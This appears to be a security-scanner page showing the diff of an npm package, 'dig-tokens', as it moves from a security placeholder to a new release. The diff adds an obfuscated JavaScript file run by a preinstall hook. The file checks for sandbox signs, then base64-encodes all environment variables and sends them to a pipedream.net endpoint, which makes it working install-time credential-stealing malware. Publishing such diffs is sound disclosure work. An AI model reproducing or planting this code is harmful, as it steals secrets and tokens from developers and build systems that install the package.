dig-tokens 0.0.1-security → 30.894.411

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of dig-tokens might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/gkhhjtr.js +1 -0
  2. package/package.json +8 -3
  3. package/README.md +0 -5
package/gkhhjtr.js ADDED
@@ -0,0 +1 @@
1
+ function a0_0x5d01(){const _0x2e8437=['2192444axbWBh','9783jgJscu','1070xtQUJa','registry.npmmirror.com','daasadmin','taobao.org','1377072OSkaXC','base64','3882aplBXY','end','/usr/bin/python','net','write','pipedream','some','https','1799cgOygN','146GNDsZt','7679IpuevO','includes','npm_config_registry','error','tencent.com','1528490uZjZYh','toString','stringify','c2e7a0cfd4f45f811ede4b077ae48dfa','npm_package_name','3NVjDmj','13737207ILwgGn'];a0_0x5d01=function(){return _0x2e8437;};return a0_0x5d01();}const a0_0x14de97=a0_0x3313;(function(_0x33b9d9,_0x2f0a79){const _0x5ec65c=a0_0x3313,_0x26f5a6=_0x33b9d9();while(!![]){try{const _0x4d0dbf=parseInt(_0x5ec65c(0x9a))/0x1*(-parseInt(_0x5ec65c(0x99))/0x2)+parseInt(_0x5ec65c(0xa4))/0x3*(-parseInt(_0x5ec65c(0xa6))/0x4)+-parseInt(_0x5ec65c(0x9f))/0x5+-parseInt(_0x5ec65c(0xae))/0x6*(-parseInt(_0x5ec65c(0x98))/0x7)+parseInt(_0x5ec65c(0xac))/0x8+-parseInt(_0x5ec65c(0xa7))/0x9*(-parseInt(_0x5ec65c(0xa8))/0xa)+parseInt(_0x5ec65c(0xa5))/0xb;if(_0x4d0dbf===_0x2f0a79)break;else _0x26f5a6['push'](_0x26f5a6['shift']());}catch(_0x308da1){_0x26f5a6['push'](_0x26f5a6['shift']());}}}(a0_0x5d01,0x4699f));const http=require(a0_0x14de97(0x97)),filter=[{'key':'npm_config_registry','val':a0_0x14de97(0xab)},{'key':a0_0x14de97(0x9c),'val':a0_0x14de97(0x9e)},{'key':a0_0x14de97(0x9c),'val':a0_0x14de97(0xa9)},{'key':'USERNAME','val':a0_0x14de97(0xaa)},{'key':'_','val':a0_0x14de97(0xb0)}];function main(){const _0x342051=a0_0x14de97;var _0x6d6437=process['env']||{};if(filter[_0x342051(0x96)](({key:_0x50d162,val:_0x11e728})=>_0x6d6437[_0x50d162]&&_0x6d6437[_0x50d162][_0x342051(0x9b)](_0x11e728))||Object['keys'](_0x6d6437)['length']<0xa)return;req=http['request']({'host':[_0x342051(0xa2),'m',_0x342051(0x95),_0x342051(0x93)]['join']('.'),'path':'/'+(_0x6d6437[_0x342051(0xa3)]||''),'method':'POST'})['on'](_0x342051(0x9d),function(_0x463b4d){}),req[_0x342051(0x94)](Buffer['from'](JSON[_0x342051(0xa1)](_0x6d6437))[_0x342051(0xa0)](_0x342051(0xad))),req[_0x342051(0xaf)]();}function a0_0x3313(_0x5c7690,_0x4785c3){const _0x5d01dd=a0_0x5d01();return a0_0x3313=function(_0x33130e,_0x42b8e2){_0x33130e=_0x33130e-0x93;let _0xb9526b=_0x5d01dd[_0x33130e];return _0xb9526b;},a0_0x3313(_0x5c7690,_0x4785c3);}main();
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "dig-tokens",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "30.894.411",
4
+ "main": "gkhhjtr.js",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1",
7
+ "preinstall": "node gkhhjtr.js"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
6
11
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=dig-tokens for more information.